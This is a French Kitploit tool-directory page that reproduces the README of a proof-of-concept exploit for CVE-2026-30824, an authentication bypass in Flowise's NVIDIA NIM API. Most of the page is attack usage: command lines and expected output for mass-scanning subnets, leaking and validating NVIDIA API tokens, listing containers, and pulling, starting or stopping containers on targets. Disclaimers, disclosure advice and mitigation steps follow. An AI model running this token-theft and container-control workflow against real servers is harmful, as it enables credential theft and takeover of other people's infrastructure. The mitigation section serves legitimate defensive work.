Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — Un exploit de preuve de concept pour **CVE-2026-30824**, une vulnérabilité critique de contournement d'authentification dans Flowise qui expose les points de terminaison de l'API NVIDIA NIM sans authentification. | Kitploit
Outils/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests de Sécurité des APITests d'Intrusion
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

Un exploit de preuve de concept pour **CVE-2026-30824**, une vulnérabilité critique de contournement d'authentification dans Flowise qui expose les points de terminaison de l'API NVIDIA NIM sans authentification.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
il y a 3 moisPas encore vérifié
Partager

CVE-2026-30824 — Vérificateur et exploit de contournement d'authentification NVIDIA NIM dans Flowise

Un vérificateur et exploit de preuve de concept pour CVE-2026-30824, une vulnérabilité critique de contournement d'authentification dans Flowise qui expose les points de terminaison de l'API NVIDIA NIM sans authentification.

Présentation de la vulnérabilité

CVE-2026-30824 est un contournement d'authentification critique dans Flowise (< 3.0.13) qui permet à des attaquants distants non authentifiés d'accéder aux points de terminaison de gestion des conteneurs NVIDIA NIM et de génération de jetons API.

ChampValeur
Score CVSS9,8 (Critique)
CWECWE-306 : Authentification manquante pour une fonction critique
Versions affectéesFlowise < 3.0.13
ImpactGestion complète des conteneurs, accès GPU, vol de jetons

Cause racine

Le chemin /api/v1/nvidia-nim/* est sur la liste blanche du middleware d'authentification global, permettant un accès non authentifié à :

  • Génération et fuite de jetons
  • Gestion des conteneurs (liste, démarrage, arrêt)
  • Téléchargement d'images Docker
  • Intégration de l'API NVIDIA

Fonctionnalités

✅ Détection de vulnérabilité — Vérification rapide si la cible est vulnérable
✅ Extraction de jetons — Fuite des jetons API NVIDIA depuis les points de terminaison vulnérables
✅ Validation de jetons — Vérification des jetons auprès de l'API NVIDIA (démonstration du rayon d'impact)
✅ Énumération des conteneurs — Liste des conteneurs NIM en cours d'exécution
✅ Analyse par lots — Analyse de plusieurs cibles à partir d'un fichier
✅ Contournement SSL — Ignore les certificats auto-signés par défaut
✅ Sortie colorée — Indicateurs d'état faciles à lire (vert/jaune/rouge)
✅ Reconnaissance — Cartographie complète des points de terminaison et diagnostics


Installation

Prérequis

  • Python 3.7+
  • Bibliothèque requests

Configuration

root@kitploit:~
# Clonez ou téléchargez le script
git clone <repository>
cd cve-2026-30824

# Installez les dépendances
pip install -r requirements.txt
# ou
pip install requests

Utilisation

Vérification de vulnérabilité de base

root@kitploit:~
# Vérifiez si une seule cible est vulnérable
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# Sortie attendue (VULNÉRABLE) :
# [+] La cible semble VULNÉRABLE (HTTP 200)
#     Réponse : {...}

Analyse de plusieurs cibles

root@kitploit:~
# Créez targets.txt avec une URL par ligne
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# Analysez toutes les cibles (mode rapide, sans invites)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# Résumé attendu :
# ============================================================
# [*] Résumé de l'analyse
# ============================================================
# [+] VULNÉRABLE : 2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] CORRIGÉ : 1
#     ✗ http://192.168.1.102:3000

Extraction du jeton API NVIDIA

root@kitploit:~
# Fuite du jeton API NVIDIA depuis le point de terminaison vulnérable
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# Sortie attendue :
# [*] Tentative de fuite du jeton API NVIDIA...
# [+] Jeton API NVIDIA : eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] Type de jeton : Bearer
# [+] Expire dans : 3600s

Validation du jeton auprès de l'API NVIDIA

root@kitploit:~
# Vérifiez qu'un jeton fuité fonctionne avec la véritable API NVIDIA
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# Sortie attendue :
# [*] Validation du jeton auprès de l'API NVIDIA...
# [+] Jeton VALIDE ! Accès à 45 modèles NVIDIA NIM.
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

Liste des conteneurs en cours d'exécution

root@kitploit:~
# Énumérez les conteneurs sur la cible
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# Sortie attendue :
# [*] Liste des conteneurs en cours d'exécution...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

Reconnaissance complète (toutes les vérifications)

root@kitploit:~
# Exécutez toutes les vérifications de reconnaissance sur la cible vulnérable
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

Options de ligne de commande

root@kitploit:~
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

Arguments facultatifs :
  -h, --help                    Affiche ce message d'aide et quitte
  -t, --target TARGET           URL cible (par ex., http://192.168.1.100:3000)
  -f, --targets-file FILE       Fichier contenant la liste des cibles (une par ligne)
  
Détection de vulnérabilité :
  --check                       Vérifie uniquement si la cible est vulnérable
  --scan-only                   Analyse les cibles pour détecter la vulnérabilité sans invites
  --debug                       Affiche les détails des requêtes et les réponses brutes
  
Exploitation :
  --get-token                   Fuit le jeton API NVIDIA
  --validate-token TOKEN        Valide le jeton fuité auprès de l'API NVIDIA
  --list-containers             Liste les conteneurs NIM en cours d'exécution
  --get-container CONTAINER_ID  Obtient les détails du conteneur
  --get-image IMAGE_ID          Obtient les détails de l'image
  --pull-image IMAGE_TAG        Télécharge une image Docker (par ex., nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   Démarre un conteneur à partir d'une balise d'image
  --container-name NAME         Nom du conteneur démarré
  --stop-container CONTAINER_ID Arrête un conteneur en cours d'exécution
  --preload                     Déclenche le point de terminaison de préchargement des ressources
  --all                         Exécute toutes les vérifications de reconnaissance
  
Avancé :
  --timeout SECONDS             Délai d'expiration des requêtes en secondes (défaut : 15)

Exemples de flux de travail

Scénario 1 : Évaluation du réseau interne

root@kitploit:~
# 1. Analysez tout le sous-réseau pour trouver des instances vulnérables
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. Pour chaque cible vulnérable, extrayez le jeton
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. Validez l'impact du jeton
python3 CVE-2026-30824.py --validate-token "<jeton-extrait>"

Scénario 2 : Preuve d'impact

root@kitploit:~
# Vérifiez la vulnérabilité et démontrez le rayon d'impact complet
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# Cela va :
# 1. Vérifier la vulnérabilité
# 2. Extraire le jeton API NVIDIA
# 3. Valider le jeton auprès de l'API NVIDIA
# 4. Lister les conteneurs en cours d'exécution
# 5. Afficher l'énumération des ressources

Scénario 3 : Surveillance continue

root@kitploit:~
# Surveillez une cible périodiquement (via cron ou un planificateur)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

Indicateurs de sortie

Couleurs

  • 🟢 VERT — Cible vulnérable ou exploitation réussie
  • 🟡 JAUNE — Corrigé/non vulnérable ou avertissement
  • 🔴 ROUGE — Erreur ou échec de connexion

Codes d'état

HTTPSignification
200✅ Vulnérable (point de terminaison accessible)
400

Dépannage

« Réponse HTML au lieu de JSON »

Problème : Le point de terminaison renvoie une page HTML au lieu d'une réponse API JSON.

Solutions :

  1. Vérifiez que la version de Flowise est réellement vulnérable (< 3.0.13)
  2. Vérifiez que la cible exécute réellement Flowise (pas une autre application)
  3. Vérifiez que le chemin du point de terminaison n'a pas changé dans cette version
  4. Vérifiez qu'un proxy inverse ou un WAF n'interfère pas

« Connexion refusée » ou « Délai d'expiration »

Problème : Impossible d'atteindre la cible.

Solutions :

root@kitploit:~
# Testez la connectivité
curl -v http://192.168.1.100:3000/

# Augmentez le délai d'expiration
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30

Erreur de certificat SSL

Problème : La cible utilise un certificat auto-signé ou expiré.

Solution : Le script désactive la vérification SSL par défaut. Si les problèmes persistent :

root@kitploit:~
# Ajoutez explicitement le port et le protocole
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check

Échec de la validation du jeton

Problème : Jeton extrait mais la validation auprès de l'API NVIDIA échoue.

Causes :

  • Le jeton a peut-être déjà expiré
  • Le jeton peut être invalide (le point de terminaison renvoie un faux jeton)
  • Connectivité réseau vers l'API NVIDIA bloquée

Considérations de sécurité

⚠️ AVIS LÉGAL

  • Cet outil est destiné uniquement aux tests de sécurité autorisés
  • L'accès non autorisé aux systèmes informatiques est illégal
  • Testez uniquement les systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite
  • L'auteur décline toute responsabilité en cas d'utilisation abusive

Divulgation responsable

Si vous découvrez cette vulnérabilité dans la nature :

  1. Documentez les constatations
  2. Contactez l'équipe de sécurité de l'organisation
  3. Accordez un délai raisonnable pour la correction (généralement 90 jours)
  4. Ne divulguez pas publiquement tant que le correctif n'est pas appliqué

Atténuation

Pour les administrateurs système

Immédiat :

  1. Mettez à niveau Flowise vers la version 3.0.13 ou ultérieure
  2. Mettez en œuvre des contrôles d'accès réseau (règles de pare-feu)
  3. Désactivez l'intégration NVIDIA NIM si elle n'est pas nécessaire
  4. Surveillez les journaux API pour détecter une utilisation suspecte de jetons

À long terme :

  1. Utilisez des règles WAF pour bloquer les chemins /api/v1/nvidia-nim/*
  2. Mettez en œuvre une limitation de débit API
  3. Activez la surveillance et les alertes de sécurité
  4. Effectuez des évaluations de sécurité régulières

Pour les développeurs

  • Examinez tous les contournements d'authentification dans le code
  • Mettez en œuvre des politiques d'accès par défaut-refus
  • Ajoutez des tests de sécurité complets pour les points de terminaison API
  • Utilisez l'analyse de sécurité automatisée dans l'IC/DC

Références

  • Entrée NVD
  • GitHub Flowise
  • Documentation NVIDIA NIM
  • CWE-306 : Authentification manquante

Licence

Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Voir le fichier LICENSE pour plus de détails.

Avertissement

Cet exploit est fourni « tel quel » sans garantie. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de test. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.


Auteur

Créé pour les tests d'intrusion autorisés et la recherche en sécurité.

Dernière mise à jour : avril 2026

Télécharger l’outil
✅ Vulnérable (erreur d'application mais le point de terminaison existe)
401🟡 Corrigé (authentification requise)
404🟡 Pas Flowise ou le point de terminaison n'existe pas
5xx🔴 Erreur serveur/mauvaise configuration